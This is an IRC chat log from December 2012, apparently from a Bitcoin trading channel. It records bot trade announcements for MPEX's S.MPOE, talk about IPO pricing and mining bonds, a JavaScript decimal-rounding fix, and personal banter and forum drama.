top 5 percent of households in Washington, D.C., made more than $500,000 on average last year, while the bottom 20 percent earned less than $9,500 - a ratio of 54 to 1. Dec 19 11:17:00 take from the rich, take from the poor, give to yourself. Dec 19 11:37:21 [MPEX] [S.MPOE] 4321 @ 0.00063633 = 2.7496 BTC [+] Dec 19 11:37:23 [MPEX] [S.MPOE] 10079 @ 0.00063666 = 6.4169 BTC [+] Dec 19 12:47:02 [MPEX] [S.MPOE] 3273 @ 0.00062922 = 2.0594 BTC [-] Dec 19 12:47:03 [MPEX] [S.MPOE] 728 @ 0.000629 = 0.4579 BTC [-] Dec 19 12:47:05 [MPEX] [S.MPOE] 3199 @ 0.00062794 = 2.0088 BTC [-] Dec 19 12:56:55 we'll see how this goes ;) https://bitcointalk.org/index.php?topic=131573.0;topicseen Dec 19 14:07:20 [MPEX] [S.MPOE] 4321 @ 0.0006282 = 2.7145 BTC [+] Dec 19 14:07:22 [MPEX] [S.MPOE] 5801 @ 0.00062794 = 3.6427 BTC [-] Dec 19 14:07:23 [MPEX] [S.MPOE] 7750 @ 0.00062679 = 4.8576 BTC [-] Dec 19 14:07:24 [MPEX] [S.MPOE] 2943 @ 0.00062428 = 1.8373 BTC [-] Dec 19 14:10:13 hmm dunno how that mpoe short will go Dec 19 14:16:05 [MPEX] [S.MPOE] 4206 @ 0.00063163 = 2.6566 BTC [+] Dec 19 14:19:28 pigeons, maybe you can try issue bonds on bitfunder :D Dec 19 14:24:58 so pigeons did the mpoe short Dec 19 14:30:32 on the other note, it's interesting how quickly it recovered Dec 19 14:39:06 no it wasn't me Dec 19 15:09:25 Ukto: posted a idea to https://bitcointalk.org/index.php?topic=125629.msg1409068#msg1409068 you can probably find useful too Dec 19 15:09:52 ah Dec 19 15:09:57 this is a simple fix to broken IPO market. Dec 19 15:09:59 working to fight javascript Dec 19 15:10:02 and its inability to do real math Dec 19 15:16:19 yeah Dec 19 15:16:20 thats all easy stuff Dec 19 15:16:23 if he says otherwise Dec 19 15:16:43 I'll look at it late tonight, or over the weekend Dec 19 15:17:04 but the 'how to' do it is already written in my head. just gotta put it in :P Dec 19 15:18:33 and since you didnt post it in bf's thread, I dont feel the need to have to timestamp reply "Done!" :P Dec 19 15:19:56 EskimoBob, I start to get impression these IPO "flaws" are completely in your head Dec 19 15:20:14 lol Dec 19 15:20:19 jurov: more shares have sold Dec 19 15:20:35 assuming final exams, and holiday dont hamper things Dec 19 15:20:39 should hit the minimal needed Dec 19 15:20:41 [MPEX] [S.MPOE] 2036 @ 0.00062428 = 1.271 BTC [-] Dec 19 15:20:43 [MPEX] [S.MPOE] 2350 @ 0.00062247 = 1.4628 BTC [-] Dec 19 15:20:44 [MPEX] [S.MPOE] 2664 @ 0.00062111 = 1.6546 BTC [-] Dec 19 15:20:49 which means next month should easily hit it Dec 19 15:21:14 assuming the bonds dont get eaten :P Dec 19 15:21:28 for december Dec 19 15:21:47 for example users can resell the promotional MPBPT shares and thus make us sell less... but I don't believe it will be significant part nor give a shit about that. Dec 19 15:22:54 Ukto, looks like there is no great btc price shakeup on horizon.. so mpoe should be profitable Dec 19 15:23:43 but anything can happen, ofc. some folks around have their doubts about mtgox ... and then all bets are off Dec 19 15:26:03 thanks for the jinx jurov Dec 19 15:27:05 jinx? Dec 19 15:27:45 "looks like there is no great btc price shakeup on horizon.. so mpoe should be profitable" Dec 19 15:29:59 [MPEX] [S.MPOE] 11100 @ 0.00062111 = 6.8943 BTC [-] Dec 19 15:30:45 what doubts about gox? Dec 19 15:31:34 mtgox payout delays for some fiat currencies are going longer and longer Dec 19 15:31:45 thats normal news Dec 19 15:31:50 for a year and a half Dec 19 15:31:59 and black swans and stuff Dec 19 15:32:13 pigeons: I dont want to know Dec 19 15:32:14 :P Dec 19 15:32:29 :) Dec 19 15:33:00 i don't understand people who put up with that. some year ago my sepa transfer took 2weeks, so i told fuck you mtgox and never looked back. Dec 19 15:33:11 alright Dec 19 15:33:16 i updated the calc feature on BF Dec 19 15:33:26 if the total btc to buy is more than available, it turns red Dec 19 15:33:38 if teh share amount to sell is more than available, then btoh the amount and total fields turn red Dec 19 15:33:39 text Dec 19 15:34:09 js is randomly bitching about the 7th and 8th decimal places tho Dec 19 15:34:34 4 * 0.00000111 is fine.. but 4 * 0.00000011 = 4.4e-7 Dec 19 15:34:55 even though its the same number of places on the output Dec 19 15:38:36 [MPEX] [S.MPOE] 2136 @ 0.00062111 = 1.3267 BTC [-] Dec 19 15:38:39 Ukto, can't you convert stuff to satoshi as first step and back as very last one? Dec 19 15:38:51 going to have to Dec 19 15:39:00 jurov: i have a feeling, you have never ever participated in any real life IPO and you are way outside of your area of competence. :) Dec 19 15:39:00 just an annoying pita Dec 19 15:39:14 gotta start somewhere Dec 19 15:40:46 EskimoBob, that is not an argument. instead you could have directed your energy into explaining why the "flaws" are so serious to warrant such bitching ;) Dec 19 15:41:03 Ukto: wht do you even fuck around with decimals? Not a good idea in any financial system Dec 19 15:42:02 cause if so many people resell instead of going long, that is imho bad price setting, or the stock is considered risky for long-term investment, etc. Dec 19 15:42:24 jurov: did you blink for too long when reading it? The "flaw" is described ;) Dec 19 15:42:33 nothing that can be solved by forbidding to resell during IPO Dec 19 15:42:43 EskimoBob: just on the web display Dec 19 15:42:47 jurov: I guess you have to read up what IPO is for Dec 19 15:42:55 since people type decimal format into a price box Dec 19 15:42:58 you have to start from decimal Dec 19 15:43:14 Ukto: but you still do math in that "layer"? Dec 19 15:43:24 yes, correct Dec 19 15:43:30 jurov: yes, turn the text price into satoshis, but when i go to divide bak to show it in decimal format, i still get 1e-7 & 1e-8 Dec 19 15:43:45 i do the mat at the sataoshi level Dec 19 15:43:48 not decimal format Dec 19 15:43:56 the issue is converting it back to decimal format for dispalying Dec 19 15:44:14 OK, i see, this is a display problem Dec 19 15:44:21 its javascript being shitty Dec 19 15:44:41 Ok, I think there is some js formatting function, don't remember exactly Dec 19 15:45:24 i think I can do toFixed... Dec 19 15:45:25 mebbe Dec 19 15:45:33 or toPrecision Dec 19 15:45:47 https://www.google.ee/search?q=javascript+integer+to+decimal Dec 19 15:46:32 yes Dec 19 15:46:35 thats what I just said Dec 19 15:47:31 / Example: toPrecision(2) when the number has 5 digits (3 before, 2 after) Dec 19 15:47:33 / It will round to the tens place expressed as an exponential Dec 19 15:47:35 num = 555.55; Dec 19 15:47:36 result = num.toPrecision(2); // result will equal 5.6e+2 Dec 19 15:48:05 / Example: toPrecision(4) when the number has 8 digits (4 before, 4 after) Dec 19 15:48:06 yeah Dec 19 15:48:08 / It will round to the ones place Dec 19 15:48:09 num = 5000.2349; Dec 19 15:48:10 thats why I ended with tofixed Dec 19 15:48:11 result = num.toPrecision(4); // result will equal 5000 Dec 19 15:48:25 EskimoBob: ive seen the apge :P Dec 19 15:49:54 is there a "round" or some crap like that for formatting the final number? Dec 19 15:51:06 function roundNumber(rnum, rlength) { // Arguments: number to round, number of decimal places Dec 19 15:51:08 var newnumber = Math.round(rnum * Math.pow(10, rlength)) / Math.pow(10, rlength); Dec 19 15:51:11 return newnumber; Dec 19 15:51:12 } Dec 19 16:09:55 javascript is lame Dec 19 16:10:07 your code is bad and you should feel bad Dec 19 16:11:22 lol Dec 19 16:13:01 agreed Dec 19 16:13:03 its all fixed now Dec 19 16:13:05 and working nice Dec 19 16:13:16 i think I will also put a light red background color in the text box Dec 19 16:13:23 just in case the red bold text isnt enough Dec 19 16:13:26 for to understand Dec 19 16:20:01 there Dec 19 16:20:03 much nicer Dec 19 16:20:15 turns totals to red if insufficient funds or shares Dec 19 16:20:32 and changes the text box background color to a light red of the price, or share amount field thats in the wrong Dec 19 16:26:50 everyone excited for Christmas? :) Dec 19 16:29:31 i am writing you an xmas present mr. vorhees Dec 19 16:29:36 for coinapult Dec 19 16:29:37 lol Dec 19 16:30:14 <[\\\\\\\\\\\\\\]> what's coming first: mayan end of the world or asic? Dec 19 16:31:00 who says thats mutually exclusive? Dec 19 16:32:02 what do you mean, thestringpuller? Dec 19 16:32:20 Mayan end of world comes first... it's on Friday Dec 19 16:33:32 friday isnt end of the world, its just the end of being sober Dec 19 16:37:22 evoorhees: its a surprise for coinapult Dec 19 16:37:22 ;) Dec 19 16:37:25 hmmm that makes me nervous Dec 19 16:39:24 thestringpuller: it's not my code :) Dec 19 16:40:28 thestringpuller: is this a good suprise or bad suprise? Dec 19 16:44:58 good surprise Dec 19 16:45:22 thestringpuller is adding insta-doublespend function into his dice android client Dec 19 16:45:22 evoorhees: dont make me ruin the surprise tho! Dec 19 16:45:33 jurov got jokes and jokes Dec 19 16:45:36 hehe Dec 19 16:46:01 how do you guys think SatoshiDice makes money? It just double spends all the money back to people ;) Dec 19 16:46:07 lol Dec 19 16:46:25 won't be discovered until the whole thing collapses on the day of the mayan apocalypse Dec 19 16:46:36 im making something to make coinapult a one click use Dec 19 16:46:46 thestringpuller: do you know Ira, the developer of coinapult? Dec 19 16:47:05 hey goes by bearbones on here Dec 19 16:47:23 wtf ... [WTS] Used Panties https://bitcointalk.org/index.php?topic=131030.0;topicseen Dec 19 16:47:26 LOL Dec 19 16:47:46 is he japanese? Dec 19 16:47:55 no idea Dec 19 16:47:59 evoorhees Dec 19 16:48:01 i had a few of those sold on my site Dec 19 16:48:06 got a sec to talk? Dec 19 16:48:12 sure Dec 19 16:48:13 I was gonna poke terra but hes still off skype Dec 19 16:50:00 https://bitcointalk.org/index.php?topic=131030.msg1408408#msg1408408 Dec 19 16:50:50 hahaha Dec 19 16:50:55 panty-otc Dec 19 16:51:01 err Dec 19 16:51:03 wot Dec 19 16:52:17 evoorhees: no dont know him Dec 19 16:56:49 has anyone done business with ciuciu? Dec 19 16:56:52 thestringpuller: well if you're actually doing something for coinapult I'd like to put you in touch with him Dec 19 16:58:59 never mind... Dec 19 17:06:10 this is cool : http://blog.perunature.com/2012/12/new-species-of-decoy-spider-likely.html Dec 19 17:07:29 [MPEX] [S.MPOE] 7300 @ 0.00061895 = 4.5183 BTC [-] Dec 19 17:30:40 evoorhees: lemme get prototype out and we can have meeting Dec 19 17:30:56 its more of a ui wrapper for now Dec 19 17:31:28 its inspired from a blogpost you wrote on bitinstant during the brazil conference. Dec 19 17:34:25 howdy asshats Dec 19 17:34:29 i mean, assets Dec 19 17:36:50 lol Dec 19 17:36:55 nice one jcpham Dec 19 17:39:45 it was a slip, i swear ;p Dec 19 17:39:57 the keys are right next to each other Dec 19 17:45:21 ;;ticker Dec 19 17:45:21 BTCUSD ticker | Best bid: 13.30711, Best ask: 13.38399, Bid-ask spread: 0.07688, Last trade: 13.30711, 24 hour volume: 24066.25823172, 24 hour low: 13.12250, 24 hour high: 13.39900, 24 hour vwap: 13.28970 Dec 19 17:46:32 jcpham: there is plenty of twitchy asshats around Dec 19 17:59:30 [MPEX] [S.MPOE] 3900 @ 0.00061895 = 2.4139 BTC [-] Dec 19 17:59:31 [MPEX] [S.MPOE] 400 @ 0.00061742 = 0.247 BTC [-] Dec 19 18:17:08 UPDATE:weekly dividend is set Dec 19 18:22:42 [MPEX] [S.MPOE] 4321 @ 0.00061875 = 2.6736 BTC [+] Dec 19 18:22:43 [MPEX] [S.MPOE] 2445 @ 0.00061891 = 1.5132 BTC [+] Dec 19 18:32:31 evening all Dec 19 18:41:00 https://plus.google.com/116009350848067911037/posts/WS4c37YykE5 Dec 19 18:43:30 good forenoon mircea_popescu :) Dec 19 18:43:46 hammering out an announcement re s.mpoe Dec 19 18:43:55 [MPEX] [S.MPOE] 4321 @ 0.00061756 = 2.6685 BTC [-] Dec 19 18:43:57 [MPEX] [S.MPOE] 7464 @ 0.00061742 = 4.6084 BTC [-] Dec 19 18:44:03 and also check out all the love http://trilema.com/2012/why-smpoe-is-worth-more-than-mtgox/#comment-91034 Dec 19 18:45:42 mircea_popescu: well, I too think it would be better to value based on the free float Dec 19 18:45:56 MtGox will soon be eclipsed Dec 19 18:46:03 smickles why ? Dec 19 18:46:25 if i sell you one acre out of a 10 acre plot of land would you propose the value of the plot is based on your acre ? Dec 19 18:46:32 rather than ~10x what you paid ? Dec 19 18:46:39 because of the control you _can_ exert on the price Dec 19 18:47:28 I think that both forms of valuation are important Dec 19 18:48:31 but considering that you own (and presumably won't sell) ~95% of shares, those 95% wouldn't be considered for a lot of market cap valuation purposes Dec 19 18:48:42 well surely everything should be considered Dec 19 18:48:58 but the presumption is false, which is why im writing. brb. Dec 19 18:49:00 for example, the S&P 500 only considers free float market cap Dec 19 18:49:28 one could consider the free float to be 50% of shares tho Dec 19 18:50:29 mircea_popescu: Good morning! Dec 19 18:50:36 chippewa hi Dec 19 18:50:55 I'm Rodrigo with a new nick name Dec 19 18:51:27 yeah, taking a strict definition, only 50% of shares are 'locked in' Dec 19 18:52:03 I'm not aware of any institutional holders who would claim ownership and buy/neutral/sell position Dec 19 18:52:22 !ticker s.mpoe Dec 19 18:52:24 [MPEX:S.MPOE] 1day: 0.00059079 / 0.00061942 / 0.00063666 (697023 shares, 431.75 BTC), 30day: 0.00049308 / 0.00053538 / 0.00063995 (102520389 shares, 54,887.71 BTC) Dec 19 18:52:54 ;;calc .00061942 * (1000000000 - 500000000) Dec 19 18:52:54 309710 Dec 19 18:53:16 ;;calc .00061942 * (1000000000) Dec 19 18:53:16 619420 Dec 19 18:53:33 so there you have free float market cap followed by implied valuation Dec 19 18:54:01 (as best as I can figure from all available information) Dec 19 18:54:58 [MPEX] [S.MPOE] 1876 @ 0.00061891 = 1.1611 BTC [+] Dec 19 18:54:59 [MPEX] [S.MPOE] 1374 @ 0.000619 = 0.8505 BTC [+] Dec 19 18:55:26 mircea_popescu: unless, of course, you have made a statemtent that you don't intend to ever sell some of that available 50% (the remaining 45% iirc) Dec 19 18:55:42 [MPEX] [S.MPOE] 4321 @ 0.00061883 = 2.674 BTC [-] Dec 19 18:55:43 [MPEX] [S.MPOE] 4779 @ 0.000619 = 2.9582 BTC [+] Dec 19 18:56:28 oh, and mircea_popescu even considering the quality of the source (investopedia): " Dec 19 18:56:37 "The free-float method is seen as a better way of calculating market capitalization because it provides a more accurate reflection of market movements." Dec 19 18:58:22 lol, wtf is a 'satoshisecond'? Dec 19 18:59:13 what is that 2weiX going on about anyway? 5% cut? 10% cut? do they not realize you essentiall have a 95% cut? Dec 19 19:05:58 http://trilema.com/2012/smpoe-owner-shares-block/ << announcement. Dec 19 19:06:34 because of the control you _can_ exert on the price <<< if I have 500k btc i CAN exert the same exact control on the price as if I had 1bn shares. Dec 19 19:06:48 what difference does it make ? of course I have resources. so do others. Dec 19 19:08:14 mircea_popescu: how did you get rich? Dec 19 19:08:25 did you rob someone? Dec 19 19:08:43 thestringpuller: who told you he is rich? Dec 19 19:08:46 heh. no. Dec 19 19:09:02 srsly though howd you build your wealth? Dec 19 19:09:14 a coin at a atime. Dec 19 19:09:17 before bitcoin Dec 19 19:09:20 :P Dec 19 19:09:29 by getting the biggest guns, aiming them well and sticking to it. Dec 19 19:09:34 you know, sorta like i built mpex. Dec 19 19:09:50 secretive are we? Dec 19 19:09:57 so you are a gun smuggler? Dec 19 19:10:10 were* Dec 19 19:10:17 thestringpuller: assasin Dec 19 19:10:27 rockstar Dec 19 19:10:29 as if i'd know tho Dec 19 19:10:48 i want to see btc fund a war Dec 19 19:10:48 clearly, he made his monies as a blogger Dec 19 19:11:06 i'd rather there wasn't a war Dec 19 19:11:22 even if it freed the north koreans? Dec 19 19:11:35 smickles you know, it was driving the romanians insane cause romanian incomes are really small and i was making a ton with the blog Dec 19 19:11:37 in relative terms Dec 19 19:11:37 thestringpuller: see, now you are putting conditions on it Dec 19 19:11:39 freed them to buy ipods? Dec 19 19:12:17 thestringpuller: we ought to free ourselves a bit more before we get too concerned about koreans Dec 19 19:12:32 how about they free themselves ? Dec 19 19:12:33 they made starcraft a science tho... Dec 19 19:12:40 i ain't pissing for anyone else and neither am i freeing them. Dec 19 19:12:59 you dont like asian girls do you? Dec 19 19:13:17 depends. if they're half-white or half-black i do Dec 19 19:13:44 dammit mircea_popescu be more subtle, the whole 'freeing ourselves a bit more' can go on indefinitely, we'd never actually get to the point of freeing koreans :P Dec 19 19:14:14 lol Dec 19 19:14:22 that is a point. Dec 19 19:14:40 how do we free ourselves from mental slavery? Dec 19 19:14:55 what mindgames are you on about now? Dec 19 19:14:59 thestringpuller: search his website address and word spam :) Dec 19 19:15:17 ;;lucky polimedia.us spam Dec 19 19:15:18 https://twitter.com/ro_spam Dec 19 19:15:24 smickles but more's the point, were you aware of the sales plan for s.mpoe ? Dec 19 19:15:34 lol Dec 19 19:15:35 loads of funny stuff pops up Dec 19 19:15:51 for the record, that twitter is run by a webhost for whom I was providing a honeypot address. Dec 19 19:16:03 they were trying to catch spam. Dec 19 19:16:03 derp Dec 19 19:16:16 (was albinuta@polimedia.us) Dec 19 19:16:16 mircea_popescu: the auction part, yeah, but since it changed, i've been unsure Dec 19 19:16:21 really? this is new Dec 19 19:16:44 smickles: bob marley mang: "emancipate yourself from mental slavery, none but ourselves can free our minds" Dec 19 19:17:07 have no fear for atomic energy none of dem canna stoppa da time Dec 19 19:17:13 yes! Dec 19 19:17:26 how long shall they kill our prophets Dec 19 19:17:33 while we stand around and look Dec 19 19:17:35 thestringpuller: http://www.youtube.com/watch?v=-sPKk3lINno Dec 19 19:17:40 that's how Dec 19 19:17:42 [MPEX] [S.MPOE] 4321 @ 0.00061769 = 2.669 BTC [-] Dec 19 19:17:43 [MPEX] [S.MPOE] 16186 @ 0.00061742 = 9.9936 BTC [-] Dec 19 19:17:45 [MPEX] [S.MPOE] 4843 @ 0.0006151 = 2.9789 BTC [-] Dec 19 19:17:53 http://jcph.am/2012/12/19/temperance/ Dec 19 19:19:09 zuck donates 500 mil Dec 19 19:19:32 to zynga Dec 19 19:20:01 sorry i only skimmed the headline Dec 19 19:20:47 LOL Dec 19 19:20:59 zynga is gonna go bankrupt Dec 19 19:38:36 I don't understand why people rag on mpex. They complain about btc related businesses getting compromised. They complain about bots manipulating the pricing and "fake" walls on mtgox. mpex doesn't have any of that crap and people bitch about it - I don't get it. Dec 19 19:38:36 waaah, I want rounded corners and lots of slick js and css... Dec 19 19:38:36 waaah, slick-xchange got 0day'd via cornerrounder.js and all the accounts are locked/stolen... Dec 19 19:38:36 waaah, people who know nothing about security are creating btc websites and getting hacked... Dec 19 19:38:36 waaah, mpex uses proven encryption but gpg is hard and the submit screen is plain... Dec 19 19:38:36 waaah, bitcoin should be taken seriously as currency... Dec 19 19:38:36 waaah, mpex is charging a fee for signup as if it was a real business but I want to slop 0.05 btc back and forth on options and 30 btc to open account is ridicuous.... Dec 19 19:38:43 ok, that guy made my day. how do you tip people on reddit ? Dec 19 19:40:50 http://www.reddit.com/r/bitcointip/comments/13iykn/bitcointip_documentation/ Dec 19 19:41:21 ty Dec 19 19:41:26 mircea_popescu: what reddit post are you talking about? Dec 19 19:41:42 EskimoBob is a scammer. Dec 19 19:42:36 thestringpuller http://www.reddit.com/r/Bitcoin/comments/14zxqr/mpex_over_1_million_btc_total_market_cap/c7iz9rw Dec 19 19:42:54 jesus this bitcoinstuff is ocmplex. anyone with the tipping set up want to send one for me ? Dec 19 19:45:44 i just learned EskimoBob doesn't have tourrette's ;) Dec 19 19:47:18 jurov what now ?! Dec 19 19:47:48 about eskimo or? Dec 19 19:48:18 mircea_popescu: that was a funny comment Dec 19 19:48:33 but srsly why you use so much php? Dec 19 19:48:45 about eskimo ya Dec 19 19:48:50 thestringpuller how much php do i use ? Dec 19 19:49:07 on the mpex site Dec 19 19:49:14 its good php but still php Dec 19 19:49:17 ... Dec 19 19:49:36 mircea_popescu: you forgot the 'waaah, mpex regularly makes people hundreds of btc, but I think derivitives are evil for no good reason and I didn't take the time to understand that bond thingy, so i'm jelly' Dec 19 19:49:50 oh yeah Dec 19 19:49:53 occumpy mpex! Dec 19 19:49:54 smickles i was just quoting. i could make that list five meters long Dec 19 19:49:55 s/hundreds/thousands/ Dec 19 19:49:56 *occupy Dec 19 19:50:17 occupy mpex Dec 19 19:50:24 OCCUPY MPEx! Dec 19 19:50:25 mircea_popescu is the one percent Dec 19 19:50:26 thestringpuller it makes pretty decent web stuff afaik. what can i tell ya. Dec 19 19:50:40 noway. it says clearly on the return slips, i am the 94% Dec 19 19:50:45 we demand you equally distribute your wealth Dec 19 19:50:46 thestringpuller: damn man it's worse than one percent, mircea_popescu is the 5%! Dec 19 19:51:05 because we are entitled Dec 19 19:51:12 for doing absolutely nothing Dec 19 19:51:32 ok, wait a sec Dec 19 19:52:08 y(1=.2)**x Dec 19 19:52:21 hmm, I retract my occupy statment Dec 19 19:52:25 lol Dec 19 19:52:37 at this rate, i'll soon be in opposition :P Dec 19 19:53:00 er, nix that =, replace with a + Dec 19 19:53:06 shift key malfunction Dec 19 19:53:12 so basically that idiot ver just sunk blockchain.info ? Dec 19 19:53:15 what the fucking hell is this. Dec 19 19:53:26 huh? Dec 19 19:53:28 how? Dec 19 19:53:37 he calls himself "bitcoin jesus". seriously. Dec 19 19:53:46 nothing about eskimo. just that he despises IPOs with tiered pricing that enable trading, cause what if the first investors resell, blabla... he's funny Dec 19 19:54:32 https://bitcointalk.org/index.php?topic=131608 Dec 19 19:54:47 nootropics! Dec 19 19:54:53 jurov yeah well, he thinks he knows stuff. Dec 19 19:54:56 its been edited a bit by now Dec 19 19:55:05 pigeons i find that the most objectionable of all. Dec 19 19:55:06 wait, Dec 19 19:55:18 tbh ver goes on my personal shitlist after this. Dec 19 19:55:21 i can be part of this occupy mpex for 29.06 more months Dec 19 19:55:24 not only is he dishonest, but he wants to lie about it. Dec 19 19:55:25 :D Dec 19 19:55:41 is he even in the wot ? Dec 19 19:55:52 my biggest problem is that he freaked out over 4 btc Dec 19 19:56:22 then its not so cool that he abused his pull with a seperate company to check on the dude's address Dec 19 19:56:37 i don't care that he freaked out. Dec 19 19:56:42 he can freak out till he's blue in the face. Dec 19 19:56:53 he's getting hanged for this one. Dec 19 19:57:25 and i'm not terribly enchanted with piuk either, he won't list it but he sells stakes to random asshats ? Dec 19 19:57:26 pfff. Dec 19 20:03:56 LOL. jurov, you are still going on about IPO stuff? Did I hurt your feelings some how? Dec 19 20:04:21 no, exactly opposite. i found it hilarious Dec 19 20:04:22 wait, whats going on now? Dec 19 20:04:48 if you have questions, pleas ask but don't be a dick about it, acting all insulted and what not Dec 19 20:04:49 mircea_popescu: are you going to add this to the drama timeline? Dec 19 20:05:03 thestringpuller don't really intend to update it, maybe make another dec 2013 Dec 19 20:05:16 jurov: laughing is good. Helps you get over your problems Dec 19 20:05:22 we should make an analytic Dec 19 20:05:24 eskimobob, i wrote my pionts/questions to btctalk Dec 19 20:05:34 where? Dec 19 20:05:35 about drama per btc per business Dec 19 20:05:58 we should call this unit the shapoopi Dec 19 20:05:58 https://bitcointalk.org/index.php?topic=125629.msg1409299#msg1409299 Dec 19 20:07:00 and deprived said similar stuff right after that Dec 19 20:07:06 jurov: you are right, it is funny Dec 19 20:07:45 so basically what's this, failed issuer manages to not sell anything and wants market controls to prop his dubious venture ? Dec 19 20:07:51 color me nuances of suprised. Dec 19 20:08:33 lol Dec 19 20:08:59 pigeons ttps://bitcointalk.org/index.php?topic=131648.0 Dec 19 20:09:55 mircea_popescu: have you ever actually bought a single share of stock in a real ipo in real world? Dec 19 20:10:11 yes. Dec 19 20:10:31 iirc i published account screenshots showing decent holdings a while back. did you ? Dec 19 20:10:49 So how come you are so clueless? Dec 19 20:10:56 EskimoBob: to be brutally fail Dec 19 20:11:00 you've said some questionable shit too Dec 19 20:11:24 EskimoBob you know, most idiots in btc harp about how clueless i am. Dec 19 20:11:35 i do not harp abouted Dec 19 20:11:41 ENGLISH PLOX Dec 19 20:11:50 omg so much drama Dec 19 20:11:52 but nice that you avoid the question Dec 19 20:11:55 what the fuck Dec 19 20:11:57 I do not have to. You do it yourself every fkn day, mp Dec 19 20:12:01 i've shown 100 of k's invested. have you ? Dec 19 20:12:02 FULL POWER TO THE POPCORN ENGINES Dec 19 20:12:17 dmc mines exclusively on nvidia gpu's Dec 19 20:12:30 jcpham: nope, Im using a giant POWER cluster now Dec 19 20:12:37 thestringpuller: Bitcoin's value is backed by drama Dec 19 20:12:47 so is high school Dec 19 20:12:47 smickles: huh. Dec 19 20:12:48 old jokes never get old Dec 19 20:12:56 lol Dec 19 20:12:59 smickles: you know, I think you might actually be right Dec 19 20:13:04 little did you know, Bitcoin was actually an invention of the entertainment industry Dec 19 20:13:23 everytime Ive seen the price spike, theres been heavy drama in the forums Dec 19 20:13:24 they couldnt sell dvds no more, so they made bitcoin Dec 19 20:13:34 Diablo-D3: what is it now? Dec 19 20:13:39 ;;ticker Dec 19 20:13:40 BTCUSD ticker | Best bid: 13.25807, Best ask: 13.33999, Bid-ask spread: 0.08192, Last trade: 13.25807, 24 hour volume: 26701.70585636, 24 hour low: 13.12250, 24 hour high: 13.39900, 24 hour vwap: 13.29278 Dec 19 20:13:46 hey it works now! Dec 19 20:13:59 and what happened to pirate hunt? Dec 19 20:15:15 he paid Dec 19 20:15:20 hurrrr Dec 19 20:15:29 lol Dec 19 20:15:45 sure Dec 19 20:15:50 to himself Dec 19 20:18:48 gwaa, the AZ copr. comiss. should hurry up already Dec 19 20:19:08 it'll be 5 weeks tomorrow Dec 19 20:20:46 wat, EskimoBob is paying dividends on his art mining with no art mining equipment backing it Dec 19 20:20:49 scam Dec 19 20:22:20 its a weed and lentils ponzi Dec 19 20:28:11 your ponzischeming? Dec 19 20:28:23 nah Dec 19 20:28:28 fonzi scheming Dec 19 20:28:32 http://security.stackexchange.com/questions/25585/is-my-developers-home-brew-password-security-right-or-wrong-and-why Dec 19 20:29:48 dub lol you are just clueless. Dec 19 20:30:16 dub: You bring up a valid question, how is EskimoBob paying dividends if he is not making any profit yet? Dec 19 20:30:42 PeterL because he bought one single share in a single irl ipo once. Dec 19 20:32:58 -_- hmm, PeterL, hmm Dec 19 20:33:50 will you not say 'valid question' validity is a property of arguments, not questions Dec 19 20:34:23 irrelephant Dec 19 20:35:35 validity is a property of questions as well, as it's a property of statements in general Dec 19 20:35:55 i want to get drunk Dec 19 20:36:02 it's 35 minutes past noon Dec 19 20:36:28 mircea_popescu: statements can contribute to validity if they are part of a valid argument :P Dec 19 20:37:45 inb4 someone makes a scope argument Dec 19 20:37:48 is $p[$q] =; 1: valid in php ? Dec 19 20:38:05 lol, by mere seconds Dec 19 20:38:17 lol Dec 19 20:38:41 mircea_popescu: yeah, we're clearly disagreeing on founding principles :D Dec 19 20:39:23 they say the only bad questions are the ones you don't ask, so if he asked a question it must be valid, right? Dec 19 20:39:25 ;;tslb Dec 19 20:39:29 Time since last block: 4 minutes and 13 seconds Dec 19 20:40:02 :| the miners hate me Dec 19 20:40:11 PeterL don't take things too bad, people rib each other lots here. Dec 19 20:40:44 no, I was agreeing with you, I think Dec 19 20:41:02 heh, yea, in fact, you could put me down by the fact that I was ribbing you with a flu flu philo position Dec 19 20:42:06 ;;calc log(1) Dec 19 20:42:06 0 Dec 19 20:42:10 ;;calc log(2) Dec 19 20:42:10 0.69314718056 Dec 19 20:42:12 wait we don't really hate each other? Dec 19 20:42:34 you and who ? Dec 19 20:42:36 sit and spin pigeons Dec 19 20:42:43 better Dec 19 20:43:07 pigeons: http://4.bp.blogspot.com/_MPPzGbeDG-k/SqoP7Qriq7I/AAAAAAAAAoM/kaYVICDiIBw/s400/Sit'nSpin.jpg Dec 19 20:43:09 all day Dec 19 20:43:36 i had one Dec 19 20:43:41 i liked to get dizzy Dec 19 20:43:52 you know that's a sign of autism now? Dec 19 20:43:56 dsm5 Dec 19 20:44:00 my kids have one Dec 19 20:44:38 mircea_popescu, apparently running a mining bond without hardware to back it up is a scam, according to such experts as EskimoBob Dec 19 20:45:13 isn't a mining bond without mining equipment a scam? Dec 19 20:45:17 that's interesting, i thought it was just a natural manifestataion of the desire living things have to get high Dec 19 20:45:36 PeterL: if you say so Dec 19 20:45:38 hmm Dec 19 20:45:44 I got a diff sit and spin when searching Dec 19 20:45:45 http://i.chzbgr.com/completestore/2009/8/14/128947892570309773.jpg Dec 19 20:45:53 otherwise it would just be a ponzi? Dec 19 20:46:28 smickles: just for you http://www.demotivationalposters.org/image/demotivational-poster/1004/sit-n-spin-toc-memories-forum-tribute-demotivational-poster-1270962207.jpg Dec 19 20:48:18 PeterL i guess it would depend on what info is used to establish payouts. but in any case it would heavily depend on the issuer's credit. Dec 19 20:50:15 the infos to hand is that payouts are established from the pocket of EskimoBob Dec 19 20:51:02 honest question. is there a difference between from his pocket vs. from stock sales? Dec 19 20:52:30 another pertinent question would be where are teh lentils, weed, deodorising crystals for the hairy women etc getting funded from Dec 19 20:53:46 hippies don't grow on trees Dec 19 20:54:55 they do around here Dec 19 20:56:31 hippies grow on moss Dec 19 20:58:00 how do you know a hippie has been staying at your house? Dec 19 20:58:12 But if one is selling a "mining bond" without doing any ming, it would at least be dishones charaterization of what they are selling? Dec 19 20:58:14 he's still there Dec 19 20:58:25 lol pigeons Dec 19 20:58:40 PeterL: some people were selling the btc output of x mhash Dec 19 20:58:46 PeterL well it could be a synthetic short deal, which'd be fine. "i'll pay youy whatever mining pays you defined as X Y Z" Dec 19 20:58:48 girls, read the forum post Dec 19 20:59:18 yeah, I guess it depends on how exactly the agreement is worded Dec 19 20:59:35 PeterL: there were a number of 1mh/s bonds issued on glbse that were not backed (at least not fully) by actual hardware, the wording was that the bondholder would recieve btc equal to the output of 1mh/s Dec 19 20:59:37 PeterL: don't guess, read :) Dec 19 20:59:48 Ukto: lol Dec 19 21:00:12 EskimoBob: are you using the term "girls" disparagingly? Seems kinda rude to 50% of the population? Dec 19 21:00:41 in this channel? Dec 19 21:00:50 population? Dec 19 21:01:24 why do so many hippies move to Oregon? Dec 19 21:01:33 they heard there was no 